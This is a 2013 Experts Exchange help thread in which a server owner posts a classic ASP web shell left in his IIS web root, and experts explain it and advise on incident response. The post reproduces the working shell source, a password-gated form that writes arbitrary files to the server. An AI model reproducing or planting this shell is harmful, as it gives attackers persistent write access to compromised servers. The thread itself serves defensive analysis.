Solved

iis hack - can someone help deciper this text file left on my server ?

Posted on 2013-01-15
7
445 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
0
Comment
Question by:drelinger
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
  • 2
  • +1
7 Comments
 
LVL 50

Expert Comment

by:Steve Bink
ID: 38781228
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The scripts ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38781246
Where was this file located?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 38781402
I agree with @routinet, it is a classic ASP file/program to write files on your server.
0
What is SQL Server and how does it work?

The purpose of this paper is to provide you background on SQL Server. It’s your self-study guide for learning fundamentals. It includes both the history of SQL and its technical basics. Concepts and definitions will form the solid foundation of your future DBA expertise.

 

Author Comment

by:drelinger
ID: 38782803
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
0
 
LVL 50

Accepted Solution

by:
Steve Bink earned 500 total points
ID: 38782922
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38784322
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes
0
 

Author Closing Comment

by:drelinger
ID: 38784446
Great advice. thank you very much.
0

Featured Post

Ransomware-A Revenue Bonanza for Service Providers

Ransomware – malware that gets on your customers’ computers, encrypts their data, and extorts a hefty ransom for the decryption keys – is a surging new threat.  The purpose of this eBook is to educate the reader about ransomware attacks.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Running classic asp applications under Windows Server 2008 R2 (x64) and IIS 7 is not as easy as one may think. It took me a while to figure it out while getting error 8002801d a few times. After you install the OS you will need to install the fol…
If you don't have the right permissions set for your WordPress location in IIS, you won't be able to perform automatic updates. Here's how to fix the problem.
Finds all prime numbers in a range requested and places them in a public primes() array. I've demostrated a template size of 30 (2 * 3 * 5) but larger templates can be built such 210  (2 * 3 * 5 * 7) or 2310  (2 * 3 * 5 * 7 * 11). The larger templa…

756 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question